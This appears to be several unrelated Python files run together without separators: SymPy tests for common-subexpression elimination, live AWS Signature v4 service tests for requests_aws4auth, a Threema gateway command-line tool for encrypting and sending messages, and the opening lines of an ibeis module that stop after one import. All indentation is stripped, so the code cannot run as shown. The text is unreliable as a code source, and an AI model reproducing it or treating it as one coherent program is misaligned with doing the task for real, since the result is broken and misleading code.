import itertools
from sympy import (Add, Pow, Symbol, exp, sqrt, symbols, sympify, cse,
Matrix, S, cos, sin, Eq, Function, Tuple)
from sympy.functions.special.hyper import meijerg
from sympy.simplify import cse_main, cse_opts
from sympy.utilities.pytest import XFAIL
w, x, y, z = symbols('w,x,y,z')
x0, x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11 = symbols('x:12')
def test_numbered_symbols():
ns = cse_main.numbered_symbols(prefix='y')
assert list(itertools.islice(
ns, 0, 10)) == [Symbol('y%s' % i) for i in range(0, 10)]
ns = cse_main.numbered_symbols(prefix='y')
assert list(itertools.islice(
ns, 10, 20)) == [Symbol('y%s' % i) for i in range(10, 20)]
ns = cse_main.numbered_symbols()
assert list(itertools.islice(
ns, 0, 10)) == [Symbol('x%s' % i) for i in range(0, 10)]
# Dummy "optimization" functions for testing.
def opt1(expr):
return expr + y
def opt2(expr):
return expr*z
def test_preprocess_for_cse():
assert cse_main.preprocess_for_cse(x, [(opt1, None)]) == x + y
assert cse_main.preprocess_for_cse(x, [(None, opt1)]) == x
assert cse_main.preprocess_for_cse(x, [(None, None)]) == x
assert cse_main.preprocess_for_cse(x, [(opt1, opt2)]) == x + y
assert cse_main.preprocess_for_cse(
x, [(opt1, None), (opt2, None)]) == (x + y)*z
def test_postprocess_for_cse():
assert cse_main.postprocess_for_cse(x, [(opt1, None)]) == x
assert cse_main.postprocess_for_cse(x, [(None, opt1)]) == x + y
assert cse_main.postprocess_for_cse(x, [(None, None)]) == x
assert cse_main.postprocess_for_cse(x, [(opt1, opt2)]) == x*z
# Note the reverse order of application.
assert cse_main.postprocess_for_cse(
x, [(None, opt1), (None, opt2)]) == x*z + y
def test_cse_single():
# Simple substitution.
e = Add(Pow(x + y, 2), sqrt(x + y))
substs, reduced = cse([e], optimizations=[])
assert substs == [(x0, x + y)]
assert reduced == [sqrt(x0) + x0**2]
def test_cse_single2():
# Simple substitution, test for being able to pass the expression directly
e = Add(Pow(x + y, 2), sqrt(x + y))
substs, reduced = cse(e, optimizations=[])
assert substs == [(x0, x + y)]
assert reduced == [sqrt(x0) + x0**2]
assert isinstance(cse(Matrix([[1]]))[1][0], Matrix)
def test_cse_not_possible():
# No substitution possible.
e = Add(x, y)
substs, reduced = cse([e], optimizations=[])
assert substs == []
assert reduced == [x + y]
# issue 3230
eq = (meijerg((1, 2), (y, 4), (5,), [], x) +
meijerg((1, 3), (y, 4), (5,), [], x))
assert cse(eq) == ([], [eq])
def test_nested_substitution():
# Substitution within a substitution.
e = Add(Pow(w*x + y, 2), sqrt(w*x + y))
substs, reduced = cse([e], optimizations=[])
assert substs == [(x0, w*x + y)]
assert reduced == [sqrt(x0) + x0**2]
def test_subtraction_opt():
# Make sure subtraction is optimized.
e = (x - y)*(z - y) + exp((x - y)*(z - y))
substs, reduced = cse(
[e], optimizations=[(cse_opts.sub_pre, cse_opts.sub_post)])
assert substs == [(x0, (x - y)*(y - z))]
assert reduced == [-x0 + exp(-x0)]
assert cse(-(x - y)*(z - y) + exp(-(x - y)*(z - y))) == \
([(x0, (x - y)*(y - z))], [x0 + exp(x0)])
# issue 978
n = -1 + 1/x
e = n/x/(-n)**2 - 1/n/x
assert cse(e) == ([], [0])
def test_multiple_expressions():
e1 = (x + y)*z
e2 = (x + y)*w
substs, reduced = cse([e1, e2], optimizations=[])
assert substs == [(x0, x + y)]
assert reduced == [x0*z, x0*w]
l = [w*x*y + z, w*y]
substs, reduced = cse(l)
rsubsts, _ = cse(reversed(l))
assert substs == rsubsts
assert reduced == [z + x*x0, x0]
l = [w*x*y, w*x*y + z, w*y]
substs, reduced = cse(l)
rsubsts, _ = cse(reversed(l))
assert substs == rsubsts
assert reduced == [x1, x1 + z, x0]
l = [(x - z)*(y - z), x - z, y - z]
substs, reduced = cse(l)
rsubsts, _ = cse(reversed(l))
substitutions = [(x0, x - z), (x1, y - z)]
assert substs == substitutions
assert rsubsts == substitutions
assert reduced == [x0*x1, x0, x1]
l = [w*y + w + x + y + z, w*x*y]
assert cse(l) == ([(x0, w*y)], [w + x + x0 + y + z, x*x0])
assert cse([x + y, x + y + z]) == ([(x0, x + y)], [x0, z + x0])
assert cse([x + y, x + z]) == ([], [x + y, x + z])
assert cse([x*y, z + x*y, x*y*z + 3]) == \
([(x0, x*y)], [x0, z + x0, 3 + x0*z])
A, B, C = symbols('A B C', commutative=False)
l = [A*B*C, A*C]
assert cse(l) == ([], l)
l = [A*B*C, A*B]
assert cse(l) == ([(x0, A*B)], [x0*C, x0])
@XFAIL
def test_powers():
assert cse(x*y**2 + x*y) == ([(x0, x*y)], [x0*y + x0])
def test_issues_1399():
assert cse(w/(x - y) + z/(y - x)) == ([], [(w - z)/(x - y)])
def test_issue_921():
assert cse(
x**5 + x**4 + x**3 + x**2) == ([(x0, x**2)], [x0*(x**3 + x + x0 + 1)])
def test_issue_1104():
assert cse(sin(x**x)/x**x) == ([(x0, x**x)], [sin(x0)/x0])
def test_issue_3164():
e = Eq(x*(-x + 1) + x*(x - 1), 0)
assert cse(e) == ([], [True])
def test_dont_cse_tuples():
from sympy import Subs
f = Function("f")
g = Function("g")
name_val, (expr,) = cse(
Subs(f(x, y), (x, y), (0, 1))
+ Subs(g(x, y), (x, y), (0, 1)))
assert name_val == []
assert expr == (Subs(f(x, y), (x, y), (0, 1))
+ Subs(g(x, y), (x, y), (0, 1)))
name_val, (expr,) = cse(
Subs(f(x, y), (x, y), (0, x + y))
+ Subs(g(x, y), (x, y), (0, x + y)))
assert name_val == [(x0, x + y)]
assert expr == Subs(f(x, y), (x, y), (0, x0)) + \
Subs(g(x, y), (x, y), (0, x0))
def test_pow_invpow():
assert cse(1/x**2 + x**2) == \
([(x0, x**2)], [x0 + 1/x0])
assert cse(x**2 + (1 + 1/x**2)/x**2) == \
([(x0, x**2)], [x0 + (1 + 1/x0)/x0])
assert cse(1/x**2 + (1 + 1/x**2)*x**2) == \
([(x0, x**2)], [x0*(1 + 1/x0) + 1/x0])
assert cse(cos(1/x**2) + sin(1/x**2)) == \
([(x0, x**2)], [sin(1/x0) + cos(1/x0)])
assert cse(cos(x**2) + sin(x**2)) == \
([(x0, x**2)], [sin(x0) + cos(x0)])
assert cse(y/(2 + x**2) + z/x**2/y) == \
([(x0, x**2)], [y/(x0 + 2) + z/(x0*y)])
assert cse(exp(x**2) + x**2*cos(1/x**2)) == \
([(x0, x**2)], [x0*cos(1/x0) + exp(x0)])
assert cse((1 + 1/x**2)/x**2) == \
([(x0, x**2)], [(1 + 1/x0)/x0])
assert cse(x**(2*y) + x**(-2*y)) == \
([(x0, x**(2*y))], [x0 + 1/x0])
def test_postprocess():
eq = (x + 1 + exp((x + 1)/(y + 1)) + cos(y + 1))
assert cse([eq, Eq(x, z + 1), z - 2, (z + 1)*(x + 1)],
postprocess=cse_main.cse_separate) == \
[[(x1, y + 1), (x2, z + 1), (x, x2), (x0, x + 1)],
[x0 + exp(x0/x1) + cos(x1), x2 - 3, x0*x2]]
def test_issue1400():
# previously, this gave 16 constants
from sympy.abc import a, b
B = Function('B')
G = Function('G')
t = Tuple(*
(a, a + S(1)/2, 2*a, b, 2*a - b + 1, (sqrt(z)/2)**(-2*a + 1)*B(2*a -
b, sqrt(z))*B(b - 1, sqrt(z))*G(b)*G(2*a - b + 1),
sqrt(z)*(sqrt(z)/2)**(-2*a + 1)*B(b, sqrt(z))*B(2*a - b,
sqrt(z))*G(b)*G(2*a - b + 1), sqrt(z)*(sqrt(z)/2)**(-2*a + 1)*B(b - 1,
sqrt(z))*B(2*a - b + 1, sqrt(z))*G(b)*G(2*a - b + 1),
(sqrt(z)/2)**(-2*a + 1)*B(b, sqrt(z))*B(2*a - b + 1,
sqrt(z))*G(b)*G(2*a - b + 1), 1, 0, S(1)/2, z/2, -b + 1, -2*a + b,
-2*a))
c = cse(t)
ans = (
[(x0, sqrt(z)), (x1, -b + 1), (x2, B(b, x0)), (x3, 2*a + x1 - 1),
(x4, B(-x1, x0)), (x5, x3 + 1), (x6, B(x3, x0)), (x7, B(x5, x0)), (x8,
2*a), (x9, (x0/2)**(-2*a + 1)*G(b)*G(x5)), (x10, x0*x9)], [(a, a +
S(1)/2, x8, b, x5, x4*x6*x9, x10*x2*x6, x10*x4*x7, x2*x7*x9, 1, 0,
S(1)/2, z/2, x1, -x3, -x8)])
assert ans == c
#!/usr/bin/env python
# coding: utf-8
"""
Live service tests
------------------
This module contains tests against live AWS services. In order to run these
your AWS access ID and access key need to be specified in the AWS_ACCESS_ID
and AWS_ACCESS_KEY environment variables respectively. This can be done with
something like:
$ AWS_ACCESS_ID='ID' AWS_ACCESS_KEY='KEY' python requests_aws4auth_test.py
If these variables are not provided the rest of the tests will still run but
the live service tests will be skipped.
The live tests perform information retrieval operations only, no chargeable
operations are performed!
"""
import unittest
import os
import json
import datetime

import requests

# Assumed import path for the classes exercised below.
from requests_aws4auth import AWS4Auth, AWS4SigningKey
live_access_id = os.getenv('AWS_ACCESS_ID')
live_secret_key = os.getenv('AWS_ACCESS_KEY')
@unittest.skipIf(live_access_id is None or live_secret_key is None,
'AWS_ACCESS_ID and AWS_ACCESS_KEY environment variables not'
' set, skipping live service tests')
class AWS4Auth_LiveService_Test(unittest.TestCase):
"""
Tests against live AWS services. To run these you need to provide your
AWS access ID and access key in the AWS_ACCESS_ID and AWS_ACCESS_KEY
environment variables respectively.
The AWS Support API is currently untested as it requires a premium
subscription, though connection parameters are supplied below if you wish
to try it.
The following services do not work with AWS auth version 4 and are excluded
from the tests:
    * Simple Email Service (SES) - AWS auth v3 only
* Simple Workflow Service - AWS auth v3 only
* Import/Export - AWS auth v2 only
* SimpleDB - AWS auth V2 only
* DevPay - AWS auth v1 only
* Mechanical Turk - has own signing mechanism
"""
services = {
'AppStream': 'appstream.us-east-1.amazonaws.com/applications',
'Auto-Scaling': 'autoscaling.us-east-1.amazonaws.com/?Action=DescribeAutoScalingInstances&Version=2011-01-01',
'CloudFormation': 'cloudformation.us-east-1.amazonaws.com?Action=ListStacks',
'CloudFront': 'cloudfront.amazonaws.com/2014-11-06/distribution?MaxItems=1',
'CloudHSM': {
'method': 'POST',
'req': 'cloudhsm.us-east-1.amazonaws.com',
'headers': {'X-Amz-Target':
'CloudHsmFrontendService.ListAvailableZones',
'Content-Type': 'application/x-amz-json-1.1'},
'body': '{}'},
'CloudSearch': 'cloudsearch.us-east-1.amazonaws.com?Action=ListDomainNames&Version=2013-01-01',
'CloudTrail': 'cloudtrail.us-east-1.amazonaws.com?Action=DescribeTrails',
'CloudWatch (monitoring)': 'monitoring.us-east-1.amazonaws.com?Action=ListMetrics',
'CloudWatch (logs)': {
'method': 'POST',
'req': 'logs.us-east-1.amazonaws.com',
'headers': {'X-Amz-Target': 'Logs_20140328.DescribeLogGroups',
'Content-Type': 'application/x-amz-json-1.1'},
'body': '{}'},
'CodeDeploy': {
'method': 'POST',
'req': 'codedeploy.us-east-1.amazonaws.com',
'headers': {'X-Amz-Target': 'CodeDeploy_20141006.ListApplications',
'Content-Type': 'application/x-amz-json-1.1'},
'body': '{}'},
'Cognito Identity': {
'method': 'POST',
'req': 'cognito-identity.us-east-1.amazonaws.com',
'headers': {'Content-Type': 'application/json',
'X-Amz_Target': 'AWSCognitoIdentityService.ListIdentityPools'},
'body': json.dumps({
'Operation': 'com.amazonaws.cognito.identity.model#ListIdentityPools',
'Service': 'com.amazonaws.cognito.identity.model#AWSCognitoIdentityService',
'Input': {'MaxResults': 1}})},
'Cognito Sync': {
'method': 'POST',
'req': 'cognito-sync.us-east-1.amazonaws.com',
'headers': {'Content-Type': 'application/json',
'X-Amz_Target': 'AWSCognitoSyncService.ListIdentityPoolUsage'},
'body': json.dumps({
'Operation': 'com.amazonaws.cognito.sync.model#ListIdentityPoolUsage',
'Service': 'com.amazonaws.cognito.sync.model#AWSCognitoSyncService',
'Input': {'MaxResults': '1'}})},
'Config': {
'method': 'POST',
'req': 'config.us-east-1.amazonaws.com',
'headers': {'X-Amz-Target':
'StarlingDoveService.DescribeDeliveryChannels',
'Content-Type': 'application/x-amz-json-1.1'},
'body': '{}'},
'DataPipeline': {
'req': 'datapipeline.us-east-1.amazonaws.com?Action=ListPipelines',
'headers': {'X-Amz-Target': 'DataPipeline.ListPipelines'},
'body': '{}'},
'Direct Connect': {
'method': 'POST',
'req': 'directconnect.us-east-1.amazonaws.com',
'headers': {'X-Amz-Target': 'OvertureService.DescribeConnections',
'Content-Type': 'application/x-amz-json-1.1'},
'body': '{}'},
'DynamoDB': {
'method': 'POST',
'req': 'dynamodb.us-east-1.amazonaws.com',
'headers': {'X-Amz-Target': 'DynamoDB_20111205.ListTables',
'Content-Type': 'application/x-amz-json-1.0'},
'body': '{}'},
'Elastic Beanstalk': 'elasticbeanstalk.us-east-1.amazonaws.com/'
'?Action=ListAvailableSolutionStacks&Version=2010-12-01',
'ElastiCache': 'elasticache.us-east-1.amazonaws.com/?Action=DescribeCacheClusters&Version=2014-07-15',
'EC2': 'ec2.us-east-1.amazonaws.com/?Action=DescribeRegions&Version=2014-06-15',
'EC2 Container Service': 'ecs.us-east-1.amazonaws.com/?Action=ListClusters&Version=2014-11-13',
'Elastic Load Balancing': 'elasticloadbalancing.us-east-1.amazonaws.com/'
'?Action=DescribeLoadBalancers&Version=2012-06-01',
'Elastic MapReduce': 'elasticmapreduce.us-east-1.amazonaws.com/?Action=ListClusters&Version=2009-03-31',
'Elastic Transcoder': 'elastictranscoder.us-east-1.amazonaws.com/2012-09-25/pipelines',
'Glacier': {
'req': 'glacier.us-east-1.amazonaws.com/-/vaults',
'headers': {'X-Amz-Glacier-Version': '2012-06-01'}},
'Identity and Access Management (IAM)': 'iam.amazonaws.com/?Action=ListUsers&Version=2010-05-08',
'Key Management Service': {
'method': 'POST',
'req': 'kms.us-east-1.amazonaws.com',
'headers': {'Content-Type': 'application/x-amz-json-1.1',
'X-Amz-Target': 'TrentService.ListKeys'},
'body': '{}'},
'Kinesis': {
'method': 'POST',
'req': 'kinesis.us-east-1.amazonaws.com',
'headers': {'Content-Type': 'application/x-amz-json-1.1',
'X-Amz-Target': 'Kinesis_20131202.ListStreams'},
'body': '{}'},
'Lambda': 'lambda.us-east-1.amazonaws.com/2014-11-13/functions/',
'Opsworks': {
'method': 'POST',
'req': 'opsworks.us-east-1.amazonaws.com',
'headers': {'Content-Type': 'application/x-amz-json-1.1',
'X-Amz-Target': 'OpsWorks_20130218.DescribeStacks'},
'body': '{}'},
'Redshift': 'redshift.us-east-1.amazonaws.com/?Action=DescribeClusters&Version=2012-12-01',
'Relational Database Service (RDS)': 'rds.us-east-1.amazonaws.com/'
'?Action=DescribeDBInstances&Version=2012-09-17',
'Route 53': 'route53.amazonaws.com/2013-04-01/hostedzone',
'Simple Storage Service (S3)': 's3.amazonaws.com',
'Simple Notification Service (SNS)': 'sns.us-east-1.amazonaws.com/?Action=ListTopics&Version=2010-03-31',
'Simple Queue Service (SQS)': 'sqs.us-east-1.amazonaws.com/?Action=ListQueues',
'Storage Gateway': {
'method': 'POST',
'req': 'storagegateway.us-east-1.amazonaws.com',
'headers': {'Content-Type': 'application/x-amz-json-1.1',
'X-Amz-Target': 'StorageGateway_20120630.ListGateways'},
'body': '{}'},
'Security Token Service': 'sts.amazonaws.com/?Action=GetSessionToken&Version=2011-06-15',
# 'Support': {
# 'method': 'POST',
# 'req': 'support.us-east-1.amazonaws.com',
# 'headers': {'Content-Type': 'application/x-amz-json-1.0',
# 'X-Amz-Target': 'Support_20130415.DescribeServices'},
# 'body': '{}'},
}
def test_live_services(self):
for service_name in sorted(self.services):
params = self.services[service_name]
# use new 3.4 subtests if available
if hasattr(self, 'subTest'):
with self.subTest(service_name=service_name, params=params):
self._test_live_service(service_name, params)
else:
self._test_live_service(service_name, params)
def _test_live_service(self, service_name, params):
if isinstance(params, dict):
method = params.get('method', 'GET')
path_qs = params['req']
headers = params.get('headers', {})
body = params.get('body', '')
else:
method = 'GET'
path_qs = params
headers = {}
body = ''
service = path_qs.split('.')[0]
url = 'https://' + path_qs
region = 'us-east-1'
auth = AWS4Auth(live_access_id, live_secret_key, region, service)
response = requests.request(method, url, auth=auth,
data=body, headers=headers)
# suppress socket close warnings
response.connection.close()
self.assertTrue(response.ok)
def test_mobileanalytics(self):
url = 'https://mobileanalytics.us-east-1.amazonaws.com/2014-06-05/events'
service = 'mobileanalytics'
region = 'us-east-1'
dt = datetime.datetime.utcnow()
date = dt.strftime('%Y%m%d')
sig_key = AWS4SigningKey(live_secret_key, region, service, date)
auth = AWS4Auth(live_access_id, sig_key)
headers = {'Content-Type': 'application/json',
'X-Amz-Date': dt.strftime('%Y%m%dT%H%M%SZ'),
'X-Amz-Client-Context':
json.dumps({
'client': {'client_id': 'a', 'app_title': 'a'},
'custom': {},
'env': {'platform': 'a'},
'services': {}})}
body = json.dumps({
'events': [{
'eventType': 'a',
'timestamp': dt.strftime('%Y-%m-%dT%H:%M:%S.000Z'),
'session': {}
}]
})
response = requests.post(url, auth=auth, headers=headers, data=body)
response.connection.close()
self.assertTrue(response.ok)
"""
The command line interface for the Threema gateway service.
"""
import binascii
import os
import re
import click
import logbook
import logbook.more
from threema.gateway import Connection
from threema.gateway import __version__ as _version
from threema.gateway import (
e2e,
feature_level,
simple,
util,
)
from threema.gateway.key import (
HMAC,
Key,
)
from threema.gateway.util import AioRunMixin
_logging_handler = None
_logging_levels = {
1: logbook.CRITICAL,
2: logbook.ERROR,
3: logbook.WARNING,
4: logbook.NOTICE,
5: logbook.INFO,
6: logbook.DEBUG,
7: logbook.TRACE,
}
# Apply mock URL when starting CLI in debug mode
_test_port = os.environ.get('THREEMA_TEST_API')
if _test_port is not None:
_mock_url = 'http://{}:{}'.format('127.0.0.1', _test_port)
Connection.urls = {key: value.replace('https://msgapi.threema.ch', _mock_url)
for key, value in Connection.urls.items()}
    click.echo(('WARNING: Currently running in test mode! '
                'The Threema Gateway Server will not be contacted!'), err=True)
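    # For example (hypothetical port), THREEMA_TEST_API=8000 rewrites an API URL
    # such as 'https://msgapi.threema.ch/send_simple' to
    # 'http://127.0.0.1:8000/send_simple'.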
class _MockConnection(AioRunMixin):
def __init__(self, private_key, public_key, identity=None):
super().__init__(blocking=False)
self.key = private_key
self._public_key = public_key
self.id = identity
async def get_public_key(self, _):
return self._public_key
@click.group()
@click.option('-v', '--verbosity', type=click.IntRange(0, len(_logging_levels)),
default=0, help="Logging verbosity.")
@click.option('-c', '--colored', is_flag=True, help='Colourise logging output.')
@click.pass_context
def cli(ctx, verbosity, colored):
"""
Command Line Interface. Use --help for details.
"""
if verbosity > 0:
# Enable logging
util.enable_logging(level=_logging_levels[verbosity])
# Get handler class
if colored:
handler_class = logbook.more.ColorizedStderrHandler
else:
handler_class = logbook.StderrHandler
# Set up logging handler
handler = handler_class(level=_logging_levels[verbosity])
handler.push_application()
global _logging_handler
_logging_handler = handler
# Store on context
ctx.obj = {}
@cli.command(short_help='Show version information.', help="""
Show the current version of the Python SDK and the implemented feature
level.
""")
def version():
click.echo('Version: {}'.format(_version))
click.echo('Feature Level: {}'.format(feature_level))
@cli.command(short_help='Encrypt a text message.', help="""
Encrypt standard input using the given sender PRIVATE KEY and recipient
PUBLIC KEY. Prints two lines to standard output: first the nonce (hex),
and then the encrypted box (hex).
""")
@click.argument('private_key')
@click.argument('public_key')
@util.aio_run
async def encrypt(private_key, public_key):
# Get key instances
private_key = util.read_key_or_key_file(private_key, Key.Type.private)
public_key = util.read_key_or_key_file(public_key, Key.Type.public)
# Read text from stdin
text = click.get_text_stream('stdin').read()
# Print nonce and message as hex
connection = _MockConnection(private_key, public_key)
message = e2e.TextMessage(connection, text=text, to_id='')
nonce, message = await message.send(get_data_only=True)
click.echo()
click.echo(binascii.hexlify(nonce))
click.echo(binascii.hexlify(message))
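# Usage sketch (hypothetical key files; assumes the package's console script is
# installed as 'threema-gateway'):
#   $ echo 'hello' | threema-gateway encrypt sender-private.key recipient-public.key
# This prints a blank line followed by the nonce and the encrypted box, both
# hex-encoded.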
@cli.command(short_help='Decrypt a text message.', help="""
Decrypt standard input using the given recipient PRIVATE KEY and sender PUBLIC KEY.
The NONCE must be given on the command line, and the box (hex) on standard input.
Prints the decrypted text message to standard output.
""")
@click.argument('private_key')
@click.argument('public_key')
@click.argument('nonce')
@util.aio_run
async def decrypt(private_key, public_key, nonce):
# Get key instances
private_key = util.read_key_or_key_file(private_key, Key.Type.private)
public_key = util.read_key_or_key_file(public_key, Key.Type.public)
# Convert nonce to bytes
nonce = binascii.unhexlify(nonce)
# Read message from stdin and convert to bytes
message = click.get_text_stream('stdin').read()
message = binascii.unhexlify(message)
# Unpack message
connection = _MockConnection(private_key, public_key)
parameters = {'from_id': '', 'message_id': '', 'date': ''}
message = await e2e.Message.receive(connection, parameters, nonce, message)
# Ensure that this is a text message
if message.type is not e2e.Message.Type.text_message:
raise TypeError('Cannot decrypt message type {} in CLI'.format(message.type))
# Print text
click.echo()
click.echo(message.text)
@cli.command(short_help='Generate a new key pair.', help="""
Generate a new key pair and write the PRIVATE and PUBLIC keys to
the respective files.
""")
@click.argument('private_key_file')
@click.argument('public_key_file')
def generate(private_key_file, public_key_file):
# Generate key pair and hexlify both keys
private_key, public_key = [Key.encode(key) for key in Key.generate_pair()]
# Write keys to files
with open(private_key_file, 'w') as sk_file, open(public_key_file, 'w') as pk_file:
sk_file.write(private_key + '\n')
pk_file.write(public_key + '\n')
# noinspection PyShadowingBuiltins
@cli.command(short_help='Hash an email address or phone number.', help="""
Hash an email address or a phone number for identity lookup.
Prints the hash in hex.
""")
@click.option('-e', '--email', help='An email address.')
@click.option('-p', '--phone', help='A phone number in E.164 format.')
def hash(**arguments):
mode = {key: value for key, value in arguments.items() if value is not None}
# Check that either email or phone has been specified
if len(mode) != 1:
error = 'Please specify exactly one email address or one phone number.'
raise click.ClickException(error)
# Unpack message and hash type
hash_type, message = mode.popitem()
# Email or phone?
if hash_type == 'email':
message = message.lower().strip()
else:
message = re.sub(r'[^0-9]', '', message)
click.echo(HMAC.hash(message, hash_type).hexdigest())
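# Usage sketch (hypothetical phone number; assumes the package's console script
# is installed as 'threema-gateway'):
#   $ threema-gateway hash -p '+41 79 123 45 67'
# Non-digit characters are stripped before hashing, so this is equivalent to
# hashing '41791234567'.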
@cli.command(short_help='Derive the public key from the private key.', help="""
Derive the public key that corresponds with the given PRIVATE KEY.
""")
@click.argument('private_key')
def derive(private_key):
# Get private key instance and derive public key
private_key = util.read_key_or_key_file(private_key, Key.Type.private)
public_key = Key.derive_public(private_key)
# Return hex encoded public key
click.echo(Key.encode(public_key))
@cli.command(short_help='Send a text message using simple mode.', help="""
    Send a text message from standard input with server-side encryption to the given ID.
FROM is the API identity and SECRET is the API secret.
Prints the message ID on success.
""")
@click.argument('to')
@click.argument('from')
@click.argument('secret')
@click.pass_context
@util.aio_run
async def send_simple(ctx, **arguments):
# Read message from stdin
text = click.get_text_stream('stdin').read().strip()
# Create connection
connection = Connection(arguments['from'], arguments['secret'], **ctx.obj)
async with connection:
# Create message
message = simple.TextMessage(
connection=connection,
to_id=arguments['to'],
text=text
)
# Send message
click.echo()
click.echo(await message.send())
@cli.command(short_help='Send a text message using end-to-end mode.', help="""
Encrypt standard input and send the text message to the given ID.
FROM is the API identity and SECRET is the API secret.
Prints the message ID on success.
""")
@click.argument('to')
@click.argument('from')
@click.argument('secret')
@click.argument('private_key')
@click.option('-k', '--public-key', help="""
The public key of the recipient. Will be fetched automatically if not provided.
""")
@click.pass_context
@util.aio_run
async def send_e2e(ctx, **arguments):
# Get key instances
private_key = util.read_key_or_key_file(arguments['private_key'], Key.Type.private)
if arguments['public_key'] is not None:
public_key = util.read_key_or_key_file(arguments['public_key'], Key.Type.public)
else:
public_key = None
# Read message from stdin
text = click.get_text_stream('stdin').read().strip()
# Create connection
connection = Connection(
identity=arguments['from'],
secret=arguments['secret'],
key=private_key,
**ctx.obj
)
async with connection:
# Create message
message = e2e.TextMessage(
connection=connection,
to_id=arguments['to'],
key=public_key,
text=text
)
# Send message
click.echo()
click.echo(await message.send())
@cli.command(short_help='Send an image using end-to-end mode.', help="""
Encrypt and send an image ('jpeg' or 'png') to the given ID.
FROM is the API identity and SECRET is the API secret.
IMAGE_PATH is a relative or absolute path to an image.
Prints the message ID on success.
""")
@click.argument('to')
@click.argument('from')
@click.argument('secret')
@click.argument('private_key')
@click.argument('image_path')
@click.option('-k', '--public-key', help="""
The public key of the recipient. Will be fetched automatically if not provided.
""")
@click.pass_context
@util.aio_run
async def send_image(ctx, **arguments):
# Get key instances
private_key = util.read_key_or_key_file(arguments['private_key'], Key.Type.private)
if arguments['public_key'] is not None:
public_key = util.read_key_or_key_file(arguments['public_key'], Key.Type.public)
else:
public_key = None
# Create connection
connection = Connection(
identity=arguments['from'],
secret=arguments['secret'],
key=private_key,
**ctx.obj
)
async with connection:
# Create message
message = e2e.ImageMessage(
connection=connection,
to_id=arguments['to'],
key=public_key,
image_path=arguments['image_path']
)
# Send message
click.echo(await message.send())
@cli.command(short_help='Send a video using end-to-end mode.', help="""
Encrypt and send a video ('mp4') including a thumbnail to the given ID.
FROM is the API identity and SECRET is the API secret.
VIDEO_PATH is a relative or absolute path to a video.
THUMBNAIL_PATH is a relative or absolute path to a thumbnail.
Prints the message ID on success.
""")
@click.argument('to')
@click.argument('from')
@click.argument('secret')
@click.argument('private_key')
@click.argument('video_path')
@click.argument('thumbnail_path')
@click.option('-k', '--public-key', help="""
The public key of the recipient. Will be fetched automatically if not provided.
""")
@click.option('-d', '--duration', help="""
Duration of the video in seconds. Defaults to 0.
""", default=0)
@click.pass_context
@util.aio_run
async def send_video(ctx, **arguments):
# Get key instances
private_key = util.read_key_or_key_file(arguments['private_key'], Key.Type.private)
if arguments['public_key'] is not None:
public_key = util.read_key_or_key_file(arguments['public_key'], Key.Type.public)
else:
public_key = None
# Create connection
connection = Connection(
identity=arguments['from'],
secret=arguments['secret'],
key=private_key,
**ctx.obj
)
async with connection:
# Create message
message = e2e.VideoMessage(
connection=connection,
to_id=arguments['to'],
key=public_key,
duration=arguments['duration'],
video_path=arguments['video_path'],
thumbnail_path=arguments['thumbnail_path']
)
# Send message
click.echo(await message.send())
@cli.command(short_help='Send a file using end-to-end mode.', help="""
Encrypt and send a file to the given ID, optionally with a thumbnail.
FROM is the API identity and SECRET is the API secret.
FILE_PATH is a relative or absolute path to a file.
Prints the message ID on success.
""")
@click.argument('to')
@click.argument('from')
@click.argument('secret')
@click.argument('private_key')
@click.argument('file_path')
@click.option('-k', '--public-key', help="""
The public key of the recipient. Will be fetched automatically if not provided.
""")
@click.option('-t', '--thumbnail-path', help="""
The relative or absolute path to a thumbnail.
""")
@click.pass_context
@util.aio_run
async def send_file(ctx, **arguments):
# Get key instances
private_key = util.read_key_or_key_file(arguments['private_key'], Key.Type.private)
if arguments['public_key'] is not None:
public_key = util.read_key_or_key_file(arguments['public_key'], Key.Type.public)
else:
public_key = None
# Create connection
connection = Connection(
identity=arguments['from'],
secret=arguments['secret'],
key=private_key,
**ctx.obj
)
async with connection:
# Create message
message = e2e.FileMessage(
connection=connection,
to_id=arguments['to'],
key=public_key,
file_path=arguments['file_path'],
thumbnail_path=arguments['thumbnail_path']
)
# Send message
click.echo(await message.send())
@cli.command(short_help='Lookup a Threema ID or the public key.', help="""
Lookup the public key of the Threema ID or the ID linked to either the
given email address or the given phone number.
FROM is the API identity and SECRET is the API secret.
""")
@click.argument('from')
@click.argument('secret')
@click.option('-e', '--email', help='An email address.')
@click.option('-p', '--phone', help='A phone number in E.164 format.')
@click.option('-i', '--id', help='A Threema ID.')
@click.pass_context
@util.aio_run
async def lookup(ctx, **arguments):
modes = ['email', 'phone', 'id']
mode = {key: value for key, value in arguments.items()
if key in modes and value is not None}
# Check that one of the modes has been selected
if len(mode) != 1:
error = 'Please specify exactly one ID, one email address or one phone number.'
raise click.ClickException(error)
# Create connection
connection = Connection(arguments['from'], secret=arguments['secret'], **ctx.obj)
async with connection:
# Do lookup
if 'id' in mode:
public_key = await connection.get_public_key(arguments['id'])
click.echo(Key.encode(public_key))
else:
click.echo(await connection.get_id(**mode))
@cli.command(short_help='Lookup the reception capabilities of a Threema ID', help="""
Lookup the reception capabilities of a Threema ID.
FROM is the API identity and SECRET is the API secret.
Prints a set of capabilities in alphabetical order on success.
""")
@click.argument('from')
@click.argument('secret')
@click.argument('id')
@click.pass_context
@util.aio_run
async def capabilities(ctx, **arguments):
# Create connection
connection = Connection(arguments['from'], arguments['secret'], **ctx.obj)
async with connection:
# Lookup and format returned capabilities
coroutine = connection.get_reception_capabilities(arguments['id'])
capabilities_ = await coroutine
click.echo(', '.join(sorted(capability.value for capability in capabilities_)))
# noinspection PyShadowingBuiltins
@cli.command(short_help='Get the number of credits left on the account', help="""
Retrieve the number of credits left on the used account.
FROM is the API identity and SECRET is the API secret.
""")
@click.argument('from')
@click.argument('secret')
@click.pass_context
@util.aio_run
async def credits(ctx, **arguments):
# Create connection
connection = Connection(arguments['from'], arguments['secret'], **ctx.obj)
async with connection:
# Get and print credits
click.echo(await connection.get_credits())
def main():
exc = None
try:
cli()
except Exception as exc_:
error = str(exc_)
exc = exc_
else:
error = None
# Print error (if any)
if error is not None:
click.echo('An error occurred:', err=True)
click.echo(error, err=True)
# Re-raise
if exc is not None:
raise exc
# Remove logging handler
if _logging_handler is not None:
_logging_handler.pop_application()
if __name__ == '__main__':
main()
# -*- coding: utf-8 -*-
"""
python -c "import doctest, ibeis; print(doctest.testmod(ibeis.model.hots.hots_nn_index))"
python -m doctest -v ibeis/model/hots/hots_nn_index.py
python -m doctest ibeis/model/hots/hots_nn_index.py
"""
from __future__ import absolute_import, division, print_function
# Standard
from six.moves import zip, map, range
